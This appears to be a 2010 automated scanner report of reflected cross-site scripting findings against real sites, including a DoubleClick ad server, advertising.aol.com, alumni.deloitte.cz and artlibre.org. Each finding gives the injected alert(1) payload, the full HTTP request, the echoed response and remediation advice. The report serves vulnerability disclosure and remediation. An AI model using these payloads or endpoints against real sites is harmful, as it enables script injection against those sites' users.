<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri ...[SNIP]... ick%3Bh%3Dv8/3a5a/17/14a/%2a/z%3B231155693%3B5-0%3B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=ddc4f"-alert(1)-"72623d3e15c&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21 ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7295"-alert(1)-"6e36561f977 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:12 GMT
Expires: Mon, 22 Nov 2010 00:11:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... /%2a/s%3B231155693%3B4-0%3B0%3B54795159%3B4307-300/250%3B38011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616d7295"-alert(1)-"6e36561f977&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http: ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f61d8"-alert(1)-"ec4061367c2 was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:21 GMT
Expires: Mon, 22 Nov 2010 00:09:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... bleclick.net/click%3Bh%3Dv8/3a5a/17/14a/%2a/s%3B231155693%3B4-0%3B0%3B54795159%3B4307-300/250%3B38011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253Af61d8"-alert(1)-"ec4061367c2&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAA ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5ca9"-alert(1)-"ec39cdc4ef5 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:53 GMT
Expires: Mon, 22 Nov 2010 00:14:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... /1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=a5ca9"-alert(1)-"ec39cdc4ef5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_busines ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22f2e"-alert(1)-"4dc1a9e7e19 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:38 GMT
Expires: Mon, 22 Nov 2010 00:14:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7152
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... 87/38538544/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=22f2e"-alert(1)-"4dc1a9e7e19&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsi ...[SNIP]...
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34ac4"-alert(1)-"b0330c890e3 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:51 GMT
Expires: Mon, 22 Nov 2010 00:09:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7152
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... .net/click%3Bh%3Dv8/3a5a/17/14a/%2a/x%3B231155693%3B6-0%3B0%3B54795159%3B4307-300/250%3B38520787/38538544/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=34ac4"-alert(1)-"b0330c890e3&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=201 ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e630"-alert(1)-"8fa588eb30a was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:28 GMT
Expires: Mon, 22 Nov 2010 00:15:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7152
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... //adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=7e630"-alert(1)-"8fa588eb30a&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_business/solutions/informationpro ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6b15"-alert(1)-"c72a06acb68 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:17 GMT
Expires: Mon, 22 Nov 2010 00:16:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7063
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon ...[SNIP]... =cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAEc6b15"-alert(1)-"c72a06acb68&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=zdnet&ct=609AA01A&cn=itmrgquestdubai"); var fscUrl = ur ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e003"-alert(1)-"21012b00b88 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:33 GMT
Expires: Mon, 22 Nov 2010 00:11:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6715
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri ...[SNIP]... z%3B231155693%3B5-0%3B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=4e003"-alert(1)-"21012b00b88&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31a76"-alert(1)-"eed06fa5ff8 was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:08:26 GMT
Expires: Mon, 22 Nov 2010 00:13:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... 0%3B0%3B54795159%3B4307-300/250%3B38520812/38538569/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=10031a76"-alert(1)-"eed06fa5ff8&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovatio ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef3da"-alert(1)-"0e0b492657e was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:18 GMT
Expires: Mon, 22 Nov 2010 00:15:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7063
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon ...[SNIP]... fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=ef3da"-alert(1)-"0e0b492657e&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=agus_itque ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8708"-alert(1)-"6c6fa352822 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:52 GMT
Expires: Mon, 22 Nov 2010 00:10:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7119
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon ...[SNIP]... 5a/17/14a/%2a/i%3B231155693%3B1-0%3B0%3B54795159%3B4307-300/250%3B37759247/37777099/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100e8708"-alert(1)-"6c6fa352822&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfc7e"-alert(1)-"9a508cfa52b was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:06 GMT
Expires: Mon, 22 Nov 2010 00:16:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... 7335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18cfc7e"-alert(1)-"9a508cfa52b&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_business/solutions/informationprotection&cmp=usmmb&cm=b&csr=infoprots ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c586e"-alert(1)-"b8e9766edfd was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:28 GMT
Expires: Mon, 22 Nov 2010 00:14:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... 8011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66Bc586e"-alert(1)-"b8e9766edfd&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/process-transforma ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11626"-alert(1)-"1111d615a75 was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:03:57 GMT
Expires: Mon, 22 Nov 2010 00:08:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7028
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/14a/%2a/d%3B231155693%3B3-0%3B0%3B54795159%3B4307-300/250%3B38011073/38028830/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=46733511626"-alert(1)-"1111d615a75&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg= ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d853"-alert(1)-"06c62bbdd38 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:34 GMT
Expires: Mon, 22 Nov 2010 00:10:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... %3Dv8/3a5a/17/14a/%2a/s%3B231155693%3B4-0%3B0%3B54795159%3B4307-300/250%3B38011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=29d853"-alert(1)-"06c62bbdd38&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36. ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c49e5"-alert(1)-"8a7d815ab33 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:03:32 GMT
Expires: Mon, 22 Nov 2010 00:08:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]...
var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/14a/%2a/u%3B231155693%3B7-0%3B0%3B54795159%3B4307-300/250%3B38520812/38538569/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041c49e5"-alert(1)-"8a7d815ab33&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121. ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1d05"-alert(1)-"b12f47b9ddd was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:31 GMT
Expires: Mon, 22 Nov 2010 00:16:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7063
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon ...[SNIP]... t=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46d1d05"-alert(1)-"b12f47b9ddd&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=zdnet&ct=609AA01A&cn=itmrgquestdubai"); var fscUrl = url; var fscUrlClickTagF ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94be2'><script>alert(1)</script>9f219222b62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/tuaw94be2'><script>alert(1)</script>9f219222b62 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.81. http://advertising.aol.com/brands/tuaw [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://advertising.aol.com
Path:
/brands/tuaw
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f1d2a'><script>alert(1)</script>baf21def41f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/tuaw?f1d2a'><script>alert(1)</script>baf21def41f=1 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.82. http://alumni.deloitte.cz/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://alumni.deloitte.cz
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e49cf"><script>alert(1)</script>5c886eb515 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e49cf"><script>alert(1)</script>5c886eb515=1 HTTP/1.1
Host: alumni.deloitte.cz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:18:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.3
Set-Cookie: PHPSESSID=75ac4f96d3bf692d5fb8c42a7e63c71e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8130
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs"> ...[SNIP]... <form name="frmLogin" id="frmLogin" action="/?e49cf"><script>alert(1)</script>5c886eb515=1" method="post"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df786<script>alert(1)</script>1f52ce30d3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /licencedf786<script>alert(1)</script>1f52ce30d3f/lalgb.html HTTP/1.1
Host: artlibre.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:33:12 GMT
Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5
X-Powered-By: PHP/4.4.4 with Hardening-Patch
X-Pingback: http://artlibre.org/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 22 Nov 2010 01:33:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 6014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9faec<script>alert(1)</script>e8dae2f14a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /licence/9faec<script>alert(1)</script>e8dae2f14a5 HTTP/1.1
Host: artlibre.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:33:16 GMT
